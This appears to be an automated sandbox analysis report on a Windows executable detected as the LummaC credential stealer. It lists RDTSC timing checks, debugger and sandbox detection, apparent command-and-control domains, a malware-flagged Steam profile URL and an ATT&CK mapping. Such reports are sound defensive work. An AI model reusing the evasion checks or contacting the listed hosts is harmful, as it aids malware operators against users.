    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E0DC1 second address: 50E0E26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 466FA26Ah 0x00000008 pushfd 0x00000009 jmp 00007F23E451539Bh 0x0000000e sbb cx, BB0Eh 0x00000013 jmp 00007F23E45153A9h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov ecx, dword ptr [eax+00000FDCh] 0x00000022 jmp 00007F23E451539Eh 0x00000027 test ecx, ecx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F23E45153A7h 0x00000030 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E0E26 second address: 50E0E53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 6237D0DAh 0x00000008 mov dh, 20h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jns 00007F23E44F37CEh 0x00000013 jmp 00007F23E44F378Ah 0x00000018 add eax, ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F23E44F378Ah 0x00000023 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E0E53 second address: 50E0E57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E0E57 second address: 50E0E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E0E5D second address: 50E0E97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F23E451539Ch 0x00000009 or al, 00000078h 0x0000000c jmp 00007F23E451539Bh 0x00000011 popfd 0x00000012 mov bl, ch 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov eax, dword ptr [eax+00000860h] 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F23E451539Eh 0x00000024 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E0E97 second address: 50E0EA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F23E44F378Eh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E0EA9 second address: 50E0ED3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23E451539Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F23E45153A5h 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E0ED3 second address: 50E0F0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23E44F3791h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F2455D495FDh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F23E44F3798h 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E0F0A second address: 50E0F19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23E451539Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E0F19 second address: 50E0F41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F23E44F378Fh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test byte ptr [eax+04h], 00000005h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F23E44F378Bh 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E01A second address: D0E030 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23E451539Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F23E4515396h 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E030 second address: D0E034 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Tries to evade debugger and weak emulator (self modifying code)
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B63AC9 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: CFE9A2 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: D9441E instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\file.exe TID: 6792Thread sleep time: -30000s >= -30000sJump to behavior
    Source: file.exe, file.exe, 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
    Source: file.exe, 00000000.00000002.2446309521.00000000012E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW\[
    Source: file.exe, 00000000.00000002.2446309521.00000000012E2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2446309521.000000000128E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2237029874.00000000012F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: file.exe, 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
    Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

    Anti Debugging

    barindex
    Hides threads from debuggers
    Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
    Tries to detect sandboxes and other dynamic analysis tools (window names)
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
    Source: C:\Users\user\Desktop\file.exeFile opened: SICE
    Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B45BB0 LdrInitializeThunk,0_2_00B45BB0

    HIPS / PFW / Operating System Protection Evasion

    barindex
    LummaC encrypted strings found
    Source: file.exeString found in binary or memory: licendfilteo.site
    Source: file.exeString found in binary or memory: clearancek.site
    Source: file.exeString found in binary or memory: bathdoomgaz.stor
    Source: file.exeString found in binary or memory: spirittunek.stor
    Source: file.exeString found in binary or memory: dissapoiznw.stor
    Source: file.exeString found in binary or memory: studennotediw.stor
    Source: file.exeString found in binary or memory: mobbipenju.stor
    Source: file.exeString found in binary or memory: eaglepawnoy.stor
    Source: file.exeBinary or memory string: %Program Manager
    Source: file.exe, 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: %Program Manager
    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Stealing of Sensitive Information

    barindex
    Yara detected LummaC Stealer
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Yara detected LummaC Stealer
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
    Command and Scripting Interpreter    		1
    DLL Side-Loading    		1
    Process Injection    		24
    Virtualization/Sandbox Evasion    		OS Credential Dumping1
    Query Registry    		Remote Services1
    Archive Collected Data    		11
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    PowerShell    		Boot or Logon Initialization Scripts1
    DLL Side-Loading    		1
    Process Injection    		LSASS Memory631
    Security Software Discovery    		Remote Desktop ProtocolData from Removable Media1
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
    Deobfuscate/Decode Files or Information    		Security Account Manager24
    Virtualization/Sandbox Evasion    		SMB/Windows Admin SharesData from Network Shared Drive3
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook5
    Obfuscated Files or Information    		NTDS2
    Process Discovery    		Distributed Component Object ModelInput Capture114
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
    Software Packing    		LSA Secrets23
    System Information Discovery    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading    		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    file.exe39%ReversingLabsWin32.Trojan.Generic
    file.exe100%AviraTR/Crypt.ZPACK.Gen
    file.exe100%Joe Sandbox ML

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://player.vimeo.com0%URL Reputationsafe
    https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f0%URL Reputationsafe
    https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
    https://www.gstatic.cn/recaptcha/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
    http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;0%URL Reputationsafe
    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
    https://steam.tv/0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900100%URL Reputationmalware
    https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english0%URL Reputationsafe
    http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
    https://store.steampowered.com/points/shop/0%URL Reputationsafe
    https://lv.queniujq.cn0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900/inventory/100%URL Reputationmalware
    https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
    https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=en0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%URL Reputationsafe
    https://checkout.steampowered.com/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%URL Reputationsafe
    https://store.steampowered.com/;0%URL Reputationsafe
    https://store.steampowered.com/about/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=english0%URL Reputationsafe
    https://help.steampowered.com/en/0%URL Reputationsafe
    https://store.steampowered.com/news/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/0%URL Reputationsafe
    http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r10%URL Reputationsafe
    https://recaptcha.net/recaptcha/;0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en0%URL Reputationsafe
    https://store.steampowered.com/stats/0%URL Reputationsafe
    https://medal.tv0%URL Reputationsafe
    https://broadcast.st.dl.eccdnx.com0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%URL Reputationsafe
    https://store.steampowered.com/steam_refunds/0%URL Reputationsafe
    https://login.steampowered.com/0%URL Reputationsafe
    https://store.steampowered.com/legal/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl0%URL Reputationsafe
    https://recaptcha.net0%URL Reputationsafe
    https://store.steampowered.com/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620160%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english0%URL Reputationsafe
    https://help.steampowered.com/0%URL Reputationsafe
    https://api.steampowered.com/0%URL Reputationsafe
    http://store.steampowered.com/account/cookiepreferences/0%URL Reputationsafe
    https://store.steampowered.com/mobile0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&amp;l=engl0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900/badges100%URL Reputationmalware

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    steamcommunity.com
    		104.102.49.254
    		truefalse
      		unknown
      sergei-esenin.com
      		104.21.53.8
      		truetrue
        		unknown
        eaglepawnoy.store
        		unknown
        		unknowntrue
          		unknown
          bathdoomgaz.store
          		unknown
          		unknowntrue
            		unknown
            spirittunek.store
            		unknown
            		unknowntrue
              		unknown
              licendfilteo.site
              		unknown
              		unknowntrue
                		unknown
                studennotediw.store
                		unknown
                		unknowntrue
                  		unknown
                  mobbipenju.store
                  		unknown
                  		unknowntrue
                    		unknown
                    clearancek.site
                    		unknown
                    		unknowntrue
                      		unknown
                      dissapoiznw.store
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        dissapoiznw.storectrue
                          		unknown
                          https://steamcommunity.com/profiles/76561199724331900true
                          • URL Reputation: malware
                          		unknown
                          eaglepawnoy.storectrue
                            		unknown
                            spirittunek.storectrue
                              		unknown
                              studennotediw.storectrue
                                		unknown
                                licendfilteo.sitectrue
                                  		unknown
                                  clearancek.sitetrue
                                    		unknown
                                    bathdoomgaz.storectrue
                                      		unknown
                                      mobbipenju.storetrue
                                        		unknown
                                        https://sergei-esenin.com/apitrue
                                          		unknown

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://player.vimeo.comfile.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&ampfile.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5ffile.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://steamcommunity.com/?subsection=broadcastsfile.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://sergei-esenin.com/file.exe, 00000000.00000002.2446309521.00000000012E2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2446309521.000000000130E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://store.steampowered.com/subscriber_agreement/file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://www.gstatic.cn/recaptcha/file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2446309521.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.valvesoftware.com/legal.htmfile.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://www.youtube.comfile.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampfile.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngfile.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://www.google.comfile.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngfile.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackfile.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLfile.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://s.ytimg.com;file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://steam.tv/file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=englishfile.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://store.steampowered.com/privacy_agreement/file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2446309521.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://store.steampowered.com/points/shop/file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://sketchfab.comfile.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://lv.queniujq.cnfile.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://steamcommunity.com/profiles/76561199724331900/inventory/file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2446309521.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmptrue
                                                        • URL Reputation: malware
                                                        		unknown
                                                        https://www.youtube.com/file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&afile.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2446309521.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://sergei-esenin.com:443/apifiles/76561199724331900file.exe, 00000000.00000002.2446309521.00000000012E2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgfile.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2446309521.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://store.steampowered.com/privacy_agreement/file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=enfile.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amfile.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://www.google.com/recaptcha/file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://checkout.steampowered.com/file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishfile.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
